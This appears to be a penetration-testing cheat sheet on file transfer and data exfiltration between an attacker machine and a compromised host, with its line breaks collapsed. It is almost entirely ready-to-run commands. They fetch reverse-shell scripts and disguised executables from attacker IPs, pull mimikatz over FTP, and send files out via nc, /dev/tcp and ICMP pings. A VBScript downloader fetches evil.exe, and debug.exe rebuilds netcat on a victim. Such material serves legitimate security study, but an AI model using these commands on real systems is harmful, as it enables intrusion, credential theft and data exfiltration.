Exfiltration
Copy&Paste Base64
Linux
base64 -w0 <file> base64 -d file Windows
certutil -encode payload.dll payload.b64certutil -decode payload.b64 payload.dllHTTP
Linux
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.pywget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shmcurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.pyfetch 10.10.14.14:8000/shell.py Windows
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf​(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"​Import-Module BitsTransferStart-BitsTransfer -Source $url -Destination $outputStart-BitsTransfer -Source $url -Destination $output -AsynchronousUpload files
​SimpleHttpServerWithFileUploads​
HTTPS Server
​import BaseHTTPServer, SimpleHTTPServerimport ssl​httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)httpd.serve_forever()FTP
FTP server (python)
pip3 install pyftpdlibpython3 -m pyftpdlib -p 21FTP server (NodeJS)
sudo npm install -g ftp-srv --saveftp-srv ftp://0.0.0.0:9876 --root /tmpFTP server (pure-ftp)
apt-get update && apt-get install pure-ftpgroupadd ftpgroupuseradd -g ftpgroup -d /dev/null -s /etc ftpuserpure-pwd useradd fusr -u ftpuser -d /ftphomepure-pw mkdbcd /etc/pure-ftpd/auth/ln -s ../conf/PureDB 60pdbmkdir -p /ftphomechown -R ftpuser:ftpgroup /ftphome//etc/init.d/pure-ftpd restartWindows client
echo open 10.11.0.41 21 > ftp.txtecho USER anonymous >> ftp.txtecho anonymous >> ftp.txtecho bin >> ftp.txtecho GET mimikatz.exe >> ftp.txtecho bye >> ftp.txtftp -n -v -s:ftp.txtSMB
Kali as server
kali_op1> impacket-smbserver -smb2support kali `pwd` kali_op2> smbserver.py -smb2support name /path/folder impacket-smbserver -smb2support -user test -password test test `pwd`Or create a smb share using samba:
apt-get install sambamkdir /tmp/smbchmod 777 /tmp/smb[public] comment = Samba on Ubuntu path = /tmp/smb read only = no browsable = yes guest ok = Yesservice smbd restartWindows
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind> net use z: \\10.10.14.14\test /user:test test ​WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"WindPS-2> cd new_disk:SCP
The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename> NC
nc -lvnp 4444 > new_filenc -vn <IP> 4444 < exfil_file/dev/tcp
Download file from victim
nc -lvnp 80 > file cat /path/file > /dev/tcp/10.10.10.10/80 Upload file to victim
nc -w5 -lvnp 80 < file_to_send.txt exec 6< /dev/tcp/10.10.10.10/4444cat <&6 > file.txtthanks to @BinaryShadow_
ICMP
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; donefrom scapy.all import *def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 0: data = pkt[ICMP].load[-4:] print(f"{data.decode('utf-8')}", flush=True, end="")​sniff(iface="tun0", prn=process_packet)SMTP
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
sudo python -m smtpd -n -c DebuggingServer :25TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation)
In Kali, start TFTP server:
mkdir /tftpatftpd --daemon --port 69 /tftpcp /path/tp/nc.exe /tftpTFTP server in python:
pip install ptftpdptftpd -p 69 tap0 . In victim, connect to the Kali server:
tftp -i <KALI-IP> get nc.exePHP
Download a file with a PHP oneliner:
VBScript
Attacker> python -m SimpleHTTPServer 80Victim
echo strUrl = WScript.Arguments.Item(0) > wget.vbsecho StrFile = WScript.Arguments.Item(1) >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbsecho Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbsecho Err.Clear >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbsecho If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbsecho http.Open "GET", strURL, False >> wget.vbsecho http.Send >> wget.vbsecho varByteArray = http.ResponseBody >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbsecho Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbsecho strData = "" >> wget.vbsecho strBuffer = "" >> wget.vbsecho For lngCounter = 0 to UBound(varByteArray) >> wget.vbsecho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbsecho Next >> wget.vbsecho ts.Close >> wget.vbscscript wget.vbs http://10.11.0.5/evil.exe evil.exeDebug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.
Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
Now it only weights 29 kb. Perfect. So now let's disassemble it:
wine exe2bat.exe nc.exe nc.txtNow we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
DNS
Last updated
Was this helpful?